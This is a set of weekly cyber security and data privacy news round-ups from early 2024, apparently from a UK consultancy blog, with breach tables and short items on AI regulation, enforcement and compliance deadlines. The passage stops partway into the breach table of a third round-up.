On 10 January, a security researcher known as ‘MrBruh’ reported on vulnerabilities in the AI hiring system Chattr.ai, which is used by many US fast food chains.

According to MrBruh, attackers could register profiles with full privileges by exploiting misconfigurations in Google Firebase – a cloud-based mobile application platform.

This gave them access to names, phone numbers, emails, plaintext passwords, branch locations, confidential messages and shift information for Chattr employees, franchisee managers and job applicants.

MrBruh, alongside two other researchers who go by the names ‘Logykk’ and ‘xyzeva’/’Eva’, then scanned more than 5 million domains for personally identifiable information exposed via other misconfigured Firebase instances.

They discovered 916 misconfigured websites, exposing 124,605,664 users’ records, including names, emails, phone numbers, passwords and financial data.

The researchers then alerted all affected organisations, sending 842 emails over 13 days. Only 24% of site owners fixed the misconfiguration.

Data breached: 124,605,664 records.

Multiple Indian brands affected by Gamooga misconfiguration

A misconfigured Apache Kafka broker belonging to the Indian marketing analytics company Gamooga exposed sensitive data relating to numerous organisations in India for over a year, “including banking service providers, insurance agencies, e-commerce stores, entertainment apps, and educational institutions”.

At least 1 million customers of well-known brands, including Swiggy, Redbus, Nykaa, BigBasket, TataMotors, ICICIPruLife and Axis Direct, are known to be affected, but the actual scale of the breach is potentially vast: Gamooga claims to track more than 1 billion users – two thirds of India’s population, or one eighth of the world’s.

Publicly accessible information included names, dates of birth, phone numbers, email addresses, IP addresses, purchase history, insurance information, payment information, and more.

Data breached: at least 1 million people’s data.

Chinese APT group compromises 70 organisations, including 48 government agencies

The Chinese advanced persistent threat group Earth Krahang is known to have targeted at least 116 organisations in 45 countries, and has successfully breached 70 organisations in 23 countries. These include 48 government agencies, 10 of which are foreign affairs ministries.

According to Trend Micro, which has been tracking the group since early 2022, the group “exploits public-facing servers and sends spear phishing emails to deliver previously unseen backdoors”.

It then uses “its malicious access to government infrastructure to attack other government entities, abusing the infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets using compromised government email accounts”.

Data breached: unknown.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 134,503,937 records known to be compromised, and 1,091 organisations suffering a newly disclosed incident. 916 of those incidents are linked to Google Firebase misconfigurations, as explained above.

This week, 1,076 organisations are known to have had data exfiltrated, exposed or otherwise breached. Only 5 definitely haven’t had data breached.

We also found 6 organisations providing a significant update on a previously disclosed incident.

Organisation(s) | Sector | Location | Data breached? | Known data breached
916 Google Firebase websites (via Chattr) (New; source 1; source 2; source 3) | Retail and hospitality | USA | Yes | 124,605,664
eClinical Solutions (New; source) | Software | USA | Yes | 3 TB
Kelson (New; source) | Construction | Canada | Yes | 1.5 TB
Gamooga, Swiggy, bigbasket.com, redBus, Nykaa, CaratLane, TataMotors, ICICI Prudential Life Insurance Company Limited and Axis Bank (New; source) | IT services, retail, manufacturing, insurance and finance | India | Yes | >1,000,000
International Luxury Group (New; source) | Retail | Switzerland | Yes | 1 TB
Grupa Topex (New; source) | Manufacturing | Poland | Yes | 638 GB
Philips Respironics (New; source 1; source 2; source 3; source 4) | Manufacturing | USA | Yes | 457,152
NewAgeSys, Inc (New; source) | Professional services | USA | Yes | 319 GB
V12Software (New; source 1; source 2) | Software | USA | Yes | 286,396
Sting AD (New; source) | Manufacturing | Bulgaria | Yes | 235,585
Therapeutic Health Services (New; source) | Healthcare | USA | Yes | 218,940
Sun Holdings (New; source) | Hospitality | USA | Yes | 182,756
3Delectronics (New; source) | Retail | Russia | Yes | 133,000
University of Wisconsin Hospitals and Clinics (New; source 1; source 2) | Healthcare | USA | Yes | 85,902
South China Athletic Association (New; source 1; source 2) | Non-profit | Hong Kong | Yes | 70,000
Select Education Group (New; source) | Professional services | USA | Yes | 67,097
PyLC (New; source) | Insurance | Mexico | Yes | 63,000
El Ezaby Pharmacy (New; source 1; source 2) | Manufacturing | Egypt | Yes | 62.4 GB
Hallesche Kraftverkehrs-& Speditions-GmbH (New; source) | Transport | Germany | Yes | 54,547
Valley Oaks Health (New; source) | Healthcare | USA | Yes | 50,352
City of Jacksonville Beach (New; source) | Public | USA | Yes | 48,949
Kirkland & Ellis (New; source 1; source 2) | Legal | USA | Yes | 48,802
Monmouth College (New; source 1; source 2) | Education | USA | Yes | 44,737
England & Wales Cricket Board (ECB) (New; source) | Leisure | UK | Yes | 43,000
GardaWorld (New; source) | Professional services | USA | Yes | 39,928
Citizens Bank of West Virginia (Update; source 1; source 2) | Finance | USA | Yes | 35,105
Podemos (New; source) | Public | Spain | Yes | 30 GB
Fidelity Investments Life Insurance (Update; source 1; source 2) | Insurance | USA | Yes | 29,073
Bethel School District (New; source) | Education | USA | Yes | 28,844
Weirton Medical Center (New; source) | Healthcare | USA | Yes | 26,793
American Renal Associates (New; source) | Healthcare | USA | Yes | At least 19,295
Tiegerman (New; source 1; source 2) | Education | USA | Yes | 19,000
R1 RCM (Update; source 1; source 2; source 3) | Software | USA | Yes | 16,121
Newton Public Schools (New; source) | Education | USA | Yes | 10,545
Healthfirst (New; source 1; source 2) | Insurance | USA | Yes | 6,836
Johnson Matthey (New; source) | Manufacturing | USA | Yes | 6,095
St. Mary’s Healthcare System for Children (New; source) | Healthcare | USA | Yes | 5,650
Simpson Strong-Tie (New; source) | Retail | USA | Yes | 5,570
Victory Bank (New; source 1; source 2) | Finance | USA | Yes | 4,292
Dental Group of Amarillo (New; source 1; source 2) | Healthcare | USA | Yes | 3,821
Eastside Union School District (New; source) | Education | USA | Yes | 3,592
Schuster Co (New; source) | Transport | USA | Yes | 3,532
Dedicated Senior Medical Centers (New; source 1; source 2) | Healthcare | USA | Yes | 3,441
Sycamore Rehabilitation Services, Inc. (New; source) | Healthcare | USA | Yes | 3,414
A5 Pharmacy Inc. (New; source 1; source 2) | Healthcare | USA | Yes | 3,000
Plymouth Tube Company Employee Benefit Plan (Update; source 1; source 2; source 3) | Insurance | USA | Yes | 2,652
Shimon Peres Negev Nuclear Research Center (New; source) | Defence | Israel | Yes | “thousands”
Orthopedics Associates of Flower Mound (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 1,759
UC San Diego Health (New; source 1; source 2) | Healthcare | USA | Yes | 1,642
Homeaglow (New; source) | IT services | USA | Yes | 1,556
California Correctional Health Care Services (New; source 1; source 2) | Healthcare | USA | Yes | 1,348
Ascend Healthcare Inc (New; source 1; source 2) | Healthcare | USA | Yes | 791
Cypress Capital Group, Inc. (New; source) | Finance | USA | Yes | 756
Community Health Group Partnership Plan (New; source 1; source 2) | Insurance | USA | Yes | 708
Seaglass Chiropractic (New; source 1; source 2) | Healthcare | USA | Yes | 650
Lindsay Municipal Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 500
Massachusetts Department of Developmental Services (New; source 1; source 2) | Public | USA | Yes | 500
Mercy Home for Children (New; source) | Healthcare | USA | Yes | 356
Gnome Landscapes & Design (Update; source 1; source 2) | Professional services | USA | Yes | 356
Mintlify (New; source) | Software | USA | Yes | 91
TD (New; source) | Finance | USA | Yes | 4
Goed (New; source) | Healthcare | Belgium | Yes | Unknown
Spa Gran Prix (New; source) | Leisure | Belgium | Yes | Unknown
Grupo Equatorial Energia (New; source) | Utilities | Brazil | Yes | Unknown
Giant Tiger (New; source) | Retail | Canada | Yes | Unknown
Radiant Logistics Inc. (New; source) | Transport | Canada | Yes | Unknown
Dongguan Southstar Electronics Limited (New; source) | Manufacturing | China | Yes | Unknown
SCHOKINAG-Schokolade-Industrie GmbH (New; source) | Manufacturing | Germany | Yes | Unknown
The Railways of Islamic Republic of Iran (RAI) (New; source) | Transport | Iran | Yes | Unknown
IronRock Insurance Company Limited (New; source) | Insurance | Jamaica | Yes | Unknown
The Pokémon Company (New; source) | Leisure | Japan | Yes | Unknown
The London Clinic (New; source 1; source 2) | Healthcare | UK | Yes | Unknown
Ultra Electronics Group (New; source) | Manufacturing | UK | Yes | Unknown
Kolbe Striping, Inc (New; source) | Construction | USA | Yes | Unknown
Dolomite (New; source) | Crypto | USA | Yes | Unknown
Lewis & Clark College (New; source) | Education | USA | Yes | Unknown
St. Mary Parish School Board (New; source) | Education | USA | Yes | Unknown
Fiduciary Outsourcing, LLC (New; source) | Finance | USA | Yes | Unknown
M&D Capital (New; source 1; source 2) | Finance | USA | Yes | Unknown
Aveanna Healthcare (New; source 1; source 2) | Healthcare | USA | Yes | Unknown
Commonwealth Healthcare Corporation (New; source) | Healthcare | USA | Yes | Unknown
EMSA (Emergency Medical Services Authority) (New; source) | Healthcare | USA | Yes | Unknown
Jordano’s Inc. (New; source 1; source 2) | Hospitality | USA | Yes | Unknown
BioLife Plasma Services (New; source) | Manufacturing | USA | Yes | Unknown
Crinetics Pharmaceuticals (New; source 1; source 2) | Manufacturing | USA | Yes | Unknown
I.A.T.S.E. National Benefit Funds (New; source) | Non-profit | USA | Yes | Unknown
Ampersand (New; source 1; source 2) | Professional services | USA | Yes | Unknown
Henry County, VA (New; source) | Public | USA | Yes | Unknown
Arx Capital (New; source 1; source 2) | Real estate | USA | Yes | Unknown
MarineMax (Update; source 1; source 2; source 3) | Retail | USA | Yes | Unknown
70 organisations, including 48 government organisations (New; source) | Public and unknown | Multiple | Yes | Unknown
Bundeskriminalamt (New; source) | Legal | Germany | Unknown | Unknown
Polycab India Limited (New; source) | Manufacturing | India | Unknown | Unknown
REG.RU (New; source) | IT services | Russia | Unknown | Unknown
Pension Fund of Ukraine (New; source) | Public | Ukraine | Unknown | Unknown
KIM (Kaluska informatsiyna merezha LLC) (New; source 1; source 2) | Telecoms | Ukraine | Unknown | Unknown
Linktelecom (New; source) | Telecoms | Ukraine | Unknown | Unknown
Мисто-ТВ (New; source) | Telecoms | Ukraine | Unknown | Unknown
Triacom (New; source 1; source 2) | Telecoms | Ukraine | Unknown | Unknown
Apex Legends Global Series (New; source) | Leisure | USA | Unknown | Unknown
City of Pensacola Government (New; source) | Public | USA | Unknown | Unknown
Giorgia Meloni’s Instagram account (New; source) | Public | Italy | No | 0
gouvernement.lu (New; source 1; source 2) | Public | Luxembourg | No | 0
MyGuichet.lu (New; source 1; source 2) | Public | Luxembourg | No | 0
dormakaba (New; source) | Retail | Switzerland | No | 0
Rt Hon. Grant Shapps MP’s RAF Dassault Falcon 900 jet (New; source) | Transport | UK | No | 0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


AI

Microsoft research finds 87% of UK organisations vulnerable to cyber attacks in the age of AI

A new report by Microsoft, in collaboration with Dr Chris Brauer of Goldsmiths, University of London, classed 87% of UK organisations as vulnerable to cyber attacks. Mission Critical: Unlocking the UK AI Opportunity Through Cybersecurity states that the UK must cement its position as a “cybersecurity superpower” in order to realise its ambition of becoming a global “AI superpower”.

Google VLOGGER generates video from photos, raising security concerns

Google researchers have unveiled VLOGGER, an AI model that can generate photorealistic videos of people from photographs and audio samples. However, security professionals have expressed concern about the technology’s potential misuse to create deepfakes that could be used for social engineering attacks.


Enforcement

Nemesis Market darknet marketplace shut down

The Office of the Public Prosecutor General in Frankfurt am Main – Central Office for Combating Cybercrime – and the German Federal Criminal Police Office have seized the server infrastructure of the darknet marketplace Nemesis Market, along with €94,000 in cryptocurrency.

US House of Representatives passes bill to block sale of US data to foreign adversaries

The House of Representatives has unanimously voted in favour of a bill to block data brokers from selling US citizens’ data to foreign adversaries.

“Today’s overwhelming vote sends a clear message that we will not allow our adversaries to undermine American national security and individual privacy by purchasing people’s personally identifiable sensitive information from data brokers,” said House Energy and Commerce Committee leaders Cathy McMorris Rodgers and Frank Pallone in a joint statement.


Other news

UK accuses China of two malicious cyber campaigns

The UK’s deputy prime minister, Oliver Dowden, has officially blamed the 2021–22 attacks on the UK’s Electoral Commission and parliamentarians on “China state-affiliated actors”.

ICO publishes new fining guidance

The UK’s data protection authority, the ICO (Information Commissioner’s Office), has published new data protection fining guidance, setting out how it calculates fines.

The ICO’s director of legal service, Tim Capel, said: “We believe the guidance will provide certainty and clarity for organisations. It shows how we reach one of our most important decisions as a regulator by explaining when, how and why we would issue a fine for a breach of the UK General Data Protection Regulation or Data Protection Act 2018.”

ISACA® qualification chosen by NCSC as part of GovAssure

ISACA’s® CISA (Certified Information Security Auditor) qualification has been chosen by the NCSC as an industry-leading standard and qualifying criterion for companies licensed to conduct assurance reviews of government organisations, as part of its new cyber assurance regime for government systems, GovAssure.


Recently published reports


Key dates

21 March 2024 – Old EU Standard Contractual Clauses expired

If you transfer data using old EU standard contractual clauses issued under the Data Protection Directive 1995, the deadline to replace them was 21 March 2024. The ICO website provides further information.

31 March 2024 – PCI DSS v4.0 transitioning deadline

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next Tuesday with the biggest and most interesting news stories, all rounded up in one place. Until then, have a good Easter.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The Week in Cyber Security and Data Privacy: 11 – 17 March 2024
https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-11-17-march-2024
Mon, 18 Mar 2024 17:37:00 +0000

65,583,602 known records breached in 127 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

73,481,539 records from alleged AT&T breach offered for sale

A threat actor known as MajorNelson has listed more than 70 million data records on a dark web forum, claiming it to be data originally exfiltrated from AT&T by a threat actor known as ShinyHunters in 2021.

The data includes names, addresses and mobile phone numbers, as well as encrypted birth dates and Social Security numbers.

AT&T has denied the breach since 2021. However, numerous researchers, including Dark Web Informer and vx-underground, have confirmed that the data does indeed relate to AT&T customers.

Data breached: 73,481,539 records.

France Travail and Cap Emploi breach affects 43 million

The French data protection authority, the CNIL, reports that the unemployment agencies France Travail (formerly Pôle emploi) and Cap Emploi have suffered a cyber attack that led to the exposure of 43 million people’s data.

According to France Travail, the breached data includes names, dates of birth, email and postal addresses, telephone numbers, social security numbers and France Travail identifiers. Passwords and bank details were not affected.

Last August, Pôle emploi suffered a data breach affecting 10 million people. At the time, the security firm Emsisoft attributed it to May 2023’s MOVEit Transfer breach, but removed the agency from its list of MOVEit victims the following month. It’s not known whether this breach relates to the MOVEit one.

Data breached: 43 million people’s data.

HIBP adds almost 3.3 million ClickASnap records to its database

In October 2022, ClickASnap announced that it had suffered a data breach on 24 September of that year, in which user emails were stolen from a database.

Have I Been Pwned has now added 3,262,980 records to its database, including email addresses, names, passwords, physical addresses, purchases, social media profiles and usernames.

Data breached: 3,262,980 records.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 65,583,602 records known to be compromised, and 127 organisations suffering a newly disclosed incident. 79 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 37 definitely haven’t had data breached.

We also found 11 organisations providing a significant update on a previously disclosed incident.

Organisation(s) (New/Update) | Source(s) | Sector | Location | Data breached? | Known data breached
AT&T (Update) | Source 1; source 2 | Telecoms | USA | Yes | 73,481,539
France Travail and Cap Emploi (New) | Source 1; source 2 | Public | France | Yes | 43,000,000
ClickASnap (Update) | Source 1; source 2 | IT services | UK | Yes | 3,262,980
AMMEGA (New) | Source | Manufacturing | Netherlands | Yes | 3 TB
MediaWorks NZ (New) | Source 1; source 2 | Media | New Zealand | Yes | 2,461,000
Kids Empire (New) | Source | Leisure | USA | Yes | 2,363,222
Plymouth Tube Company (New) | Source | Manufacturing | USA | Yes | 1.83 TB
GPAA (Government Pensions Administration Agency) (New) | Source 1; source 2 | Public | South Africa | Yes | 1.08 TB
Health Service Executive (New) | Source | Healthcare | Ireland | Yes | >1,000,000
Teupe Gruppe (New) | Source | Construction | Germany | Yes | >1 TB
Cleshar (New) | Source | Transport | UK | Yes | 1 TB
OYAK (New) | Source | Finance | Turkey | Yes | 720 GB
Flipkart (Update) | Source 1; source 2 | IT services | India | Yes | 552,094
Reny Picot (New) | Source | Manufacturing | Spain | Yes | 350 GB
Instituto Tecnológico Superior de Atlixco, CECyTE Morelos, Municipio de San Andrés Cholula, Departamento de Farmacología, FacMed, UNAM, and others (New) | Source | Education, public and others | Mexico | Yes | 250 GB
GLG (Gerson Lehrman Group) (New) | Source | Professional services | USA | Yes | 152,621
Rashim LTD and Israeli universities, including Sapir College, Sakhnin College and the Policy Academy in Beit Shemesh (New) | Source 1; source 2 | Software and education | Israel | Yes | 120 GB
Prince George County Public Schools (New) | Source | Education | USA | Yes | 117,785
Zapping (New) | Source | Leisure | Chile | Yes | >100,000
Saint Louis University (New) | Source | Education | USA | Yes | 93,612
Nations Direct Mortgage (New) | Source | Finance | USA | Yes | 83,108
Bradford-Scott Data, Massachusetts Family Credit Union, Methuen Federal Credit Union, Priority Plus Federal Credit Union, StagePoint Federal Credit Union, Wellness Federal Credit Union and Community Credit Union of New Milford (Update) | Source 1; source 2 | IT services and finance | USA | Yes | 43,414
CCM Health (New) | Source | Healthcare | USA | Yes | 29,182
Stanford University Department of Public Safety (Update) | Source 1; source 2 | Education | USA | Yes | 27,000
Eland Energy, Inc. (New) | Source | Energy | USA | Yes | 18,237
Precision Tune Auto Care (Update) | Source 1; source 2 | Manufacturing | USA | Yes | 15,633
Teleflora (Update) | Source 1; source 2 | Manufacturing | USA | Yes | 12,635
The Biltmore Company (New) | Source | Retail | USA | Yes | 11,530
Rudman Winchell (New) | Source | Legal | USA | Yes | 11,327
Double Eagle Energy Holdings IV LLC (Update) | Source 1; source 2 | Energy | USA | Yes | 9,040
Faculty of Exact, Physical and Natural Sciences at Universidad de Córdoba (New) | Source | Education | Argentina | Yes | 8,841
Texas Health and Human Services (New) | Source | Public | USA | Yes | 3,392
Universidad de Córdoba (New) | Source | Education | Argentina | Yes | 2,858
Ada Technologies Incorporated (New) | Source 1; source 2 | Manufacturing | USA | Yes | 2,398
KMJ Health Solutions (New) | Source 1; source 2 | IT services | USA | Yes | 2,191
ACR Electronics, Inc. (New) | Source | Manufacturing | USA | Yes | 2,045
Grow Financial Federal Credit Union (New) | Source | Finance | USA | Yes | 1,635
Bay Surgical Specialists (New) | Source 1; source 2 | Healthcare | USA | Yes | 1,505
Orsini Specialty Pharmacy (New) | Source 1; source 2 | Manufacturing | USA | Yes | 1,433
BlueCross BlueShield of Tennessee, Inc. and Volunteer State Health Plan, Inc. d/b/a BlueCare Plus Tennessee (Update) | Source 1; source 2 | Insurance | USA | Yes | 1,251
Taft Stettinius & Hollister LLP (New) | Source | Legal | USA | Yes | 641
Oakland Community Health Network (New) | Source 1; source 2 | Healthcare | USA | Yes | 607
East Side Health District (New) | Source 1; source 2 | Healthcare | USA | Yes | 559
Lake of the Woods County Department of Social Services (New) | Source 1; source 2 | Public | USA | Yes | 537
Jewish Home Lifecare (New) | Source 1; source 2 | Healthcare | USA | Yes | 501
Khorfakkan Municipality (New) | Source | Public | UAE | Yes | 369
Four Seasons Sales & Service (New) | Source | Retail | USA | Yes | 269
RPS Defense (New) | Source | Manufacturing | USA | Yes | 213
Port City Air (New) | Source | Transport | USA | Yes | 125
West Chester University of Pennsylvania (New) | Source | Education | USA | Yes | >36
MSI United States and DonorPerfect (New) | Source | Non-profit and software | USA | Yes | 24
Northeast Credit Union (New) | Source | Finance | USA | Yes | 9
Intuit (New) | Source | Software | USA | Yes | 1
Mozaic (New) | Source | Crypto | British Virgin Islands | Yes | Unknown
ZSB & Company Professional Corporation (New) | Source | Finance | Canada | Yes | Unknown
Journey Freight International (New) | Source | Transport | Canada | Yes | Unknown
ADOM Salud (New) | Source | Healthcare | Colombia | Yes | Unknown
Dörr Group (New) | Source | Retail | Germany | Yes | Unknown
VOID Interactive (New) | Source | Software | Ireland | Yes | Unknown
The Lebanese Organization for Studies and Training (New) | Source | Non-profit | Lebanon | Yes | Unknown
FGV Holdings Berhad (New) | Source | Manufacturing | Malaysia | Yes | Unknown
AirAsia (New) | Source | Transport | Malaysia | Yes | Unknown
Banregio (New) | Source | Finance | Mexico | Yes | Unknown
Topa Partners Ltd (New) | Source | Professional services | New Zealand | Yes | Unknown
Ministerio de Educación del Perú (New) | Source | Public | Peru | Yes | Unknown
Acer Philippines (New) | Source | Manufacturing | Philippines | Yes | Unknown
Brooks Tropicals (New) | Source | Agricultural | USA | Yes | Unknown
DHanis ISD (New) | Source | Education | USA | Yes | Unknown
Scranton School District (New) | Source | Education | USA | Yes | Unknown
Encina Wastewater Authority (New) | Source | Environmental | USA | Yes | Unknown
ATMCo (New) | Source | Finance | USA | Yes | Unknown
EquiLend (Update) | Source 1; source 2; source 3 | Finance | USA | Yes | Unknown
Orthopedics Associates of Flower Mound (New) | Source 1; source 2 | Healthcare | USA | Yes | Unknown
Rancho Medical Family Group (New) | Source 1; source 2 | Healthcare | USA | Yes | Unknown
St. Rose Dominican Hospitals (Rose de Lima) (New) | Source 1; source 2 | Healthcare | USA | Yes | Unknown
Facey Goss & McPhee P.C. (New) | Source | Legal | USA | Yes | Unknown
International Monetary Fund (New) | Source | Public | USA | Yes | Unknown
Wyoming Financial Group (WERCS) (New) | Source | Real estate | USA | Yes | Unknown
The North Face (New) | Source | Retail | USA | Yes | Unknown
Opus Match (New) | Source | Software | USA | Yes | Unknown
R1 RCM (New) | Source 1; source 2 | Software | USA | Yes | Unknown
Jonathan Katz (former manager of a telecoms company from Burlington County, New Jersey) (New) | Source | Telecoms | USA | Yes | Unknown
edpnet België (New) | Source | Telecoms | Belgium | Unknown | Unknown
Town of Huntsville (New) | Source | Public | Canada | Unknown | Unknown
Prensa Latina TV (New) | Source | Media | Cuba | Unknown | Unknown
Petroltecnica S.p.A. (New) | Source | Environmental | Italy | Unknown | Unknown
Fujitsu (New) | Source | IT services | Japan | Unknown | Unknown
Meduza (New) | Source | Media | Latvia | Unknown | Unknown
Russian polling stations (New) | Source | Public | Russia | Unknown | Unknown
Moscow Metro (New) | Source | Transport | Russia | Unknown | Unknown
NHS Dumfries & Galloway (New) | Source 1; source 2 | Healthcare | UK | Unknown | Unknown
Option Care Health (New) | Source | Healthcare | USA | Unknown | Unknown
CHRG (New) | Source | Hospitality | Australia | No | 0
Dozens of Estonian government institutions (New) | Source | Public | Estonia | No | 0
8 French government agencies (New) | Source 1; source 2 | Public | France | No | 0
Liverpool John Lennon Airport (New) | Source | Transport | UK | No | 0
Multiple Alabama government agencies (New) | Source | Public | USA | No | 0
MarineMax (New) | Source | Retail | USA | No | 0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


AI

MEPs adopt Artificial Intelligence Act

The European Parliament has endorsed the EU Artificial Intelligence Act, with 523 MEPs voting in favour and 46 against the Act. There were 49 abstentions.

The Act “aims to protect fundamental rights, democracy, the rule of law and environmental sustainability from high-risk AI, while boosting innovation and establishing Europe as a leader in the field”. It also “establishes obligations for AI based on its potential risks and level of impact”.

Garante launches investigation into OpenAI’s Sora

Italy’s data protection authority, the Garante per la Protezione dei Dati Personali, has announced that it is investigating OpenAI following the launch of a new AI model called Sora, which is capable of creating videos from short textual instructions. The Garante is considering the possible implications Sora could have for the processing of EU residents’ personal data.


Enforcement

European Commission’s use of Microsoft 365 infringes data protection law

The EDPS (European Data Protection Supervisor) has announced that it has found the European Commission’s use of Microsoft 365 infringed several data protection provisions that apply to EUIs (EU institutions, bodies, offices and agencies), including ensuring that personal data transferred outside the EEA is subject to appropriate safeguards.

LockBit associate pleads guilty to cyber extortion

Mikhail Vasiliev, a hacker awaiting extradition from Canada to the US on cyber crime charges, has pleaded guilty to eight counts of cyber extortion, mischief and weapons charges. Vasiliev was arrested over a year ago for committing crimes in connection with the LockBit ransomware group.

Justice officials say Vasiliev took tens of millions of dollars in ransom payments from at least 1,000 ransomware attacks.

Meanwhile, LockBit’s purported leader has vowed to continue its ransomware attacks, despite the massive law enforcement operation that disrupted the group earlier this year.

Polish supervisory authority issues two €24,000 fines for data breach notification failures

Poland’s data protection authority, the UODO (Urząd Ochrony Danych Osobowych), fined two organisations last year for failing to notify it of personal data breaches.

According to the EDPB (European Data Protection Board), the UODO fined an insurance company €24,000 in October 2023 after an unauthorised recipient received an email that was sent in error. The email’s attachment contained personal data belonging to an insurance claimant.

The UODO also fined the District Court in Krakow the same amount in December 2023 after it sent a package containing personal data to the Minister of Foreign Affairs, which arrived damaged and incomplete. The Court, which was the data controller in this instance, failed to notify the supervisory authority of the breach.


Other news

noyb complains that Swedish data broker uses legal loophole to evade GDPR

The privacy rights campaign group noyb has filed a complaint against one of Sweden’s largest data brokers, MrKoll. Noyb argues that MrKoll’s use of a media licence unfairly exempts it from its obligations under the GDPR (General Data Protection Regulation), depriving “people of their fundamental right to privacy and [exposing] their most intimate data to the internet”.

ICO publishes view on DPDI Bill

The ICO (Information Commissioner’s Office) has published its view on the government’s DPDI (Data Protection and Digital Information) Bill as it reaches the Lords committee stage. The Bill aims to reform data protection law in the UK.

Browsers add extra protection to help secure users

Google has announced that Chrome will now use real-time Safe Browsing protections to show warnings when users visit potentially unsafe websites.

And Microsoft has announced that new security protections in Edge and other Chromium-based browsers will prevent criminal hackers from using an exploit in a Renderer Process to escape the Renderer sandbox. This will prevent “attackers from using an exploit to enable the Mojo JavaScript bindings (MojoJS) for their site context within the Renderer”.


Key dates

31 March 2024 – PCI DSS v4.0 transitioning deadline 

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The Week in Cyber Security and Data Privacy: 19 – 25 February 2024
https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-19-25-february-2024
Tue, 27 Feb 2024 14:24:49 +0000

18,267,244 known records breached in 94 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

loanDepot reports an extra 324,071 victims

In January, the mortgage lender loanDepot announced in an SEC filing that an unauthorised third party had gained access to the sensitive personal information of about 16.6 million individuals in its systems.

In a new breach notification to the Maine Attorney General this week, it reported that an extra 324,071 individuals were affected. The breached data includes names, addresses, emails, phone numbers, dates of birth, and financial account and Social Security numbers.

Data breached: 16,924,071 individuals’ data.

The Colorado Department of Health Care Policy & Financing reports a further 474,936 victims

Last October, the Colorado Department of Health Care Policy & Financing notified the Maine Attorney General of a breach affecting 4,187,732 people. The incident was caused by the MOVEit Transfer vulnerability.

This week, the Department informed the Maine regulator that an additional 474,936 individuals were impacted. The breached data may include names, Social Security numbers and health insurance information.

Data breached: 4,662,668 individuals’ data.

2,350,236 individuals’ health data compromised in American Vision Partners breach

Medical Management Resource Group, L.L.C. (doing business as American Vision Partners), an eye care practitioner with more than 100 eye care centres across the US, reported a data breach affecting 2,350,236 people.

For all individuals, the breached data included names, contact details, dates of birth and medical information. For some victims, the stolen data also included Social Security numbers and health insurance information.

Data breached: 2,350,236 individuals’ data.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 18,267,244 records known to be compromised, and 94 organisations suffering a newly disclosed incident. 86 of them are known to have had data exfiltrated, exposed or otherwise breached. None definitely haven’t had data breached.

We also found 4 organisations providing a significant update on a previously disclosed incident.

Organisation(s) (New/Update) | Source(s) | Sector | Location | Data breached? | Known data breached
loanDepot (Update) | Source 1; source 2 | Finance | USA | Yes | 16,924,071
Colorado Department of Health Care Policy & Financing (Update) | Source 1; source 2 | Public | USA | Yes | 4,662,668
Medical Management Resource Group, L.L.C. (American Vision Partners) (New) | Source 1; source 2; source 3 | Healthcare | USA | Yes | 2,350,236
March Construction (New) | Source | Construction | USA | Yes | 1.8 TB
Roncelli Plastics (New) | Source | Manufacturing | USA | Yes | 1.6 TB
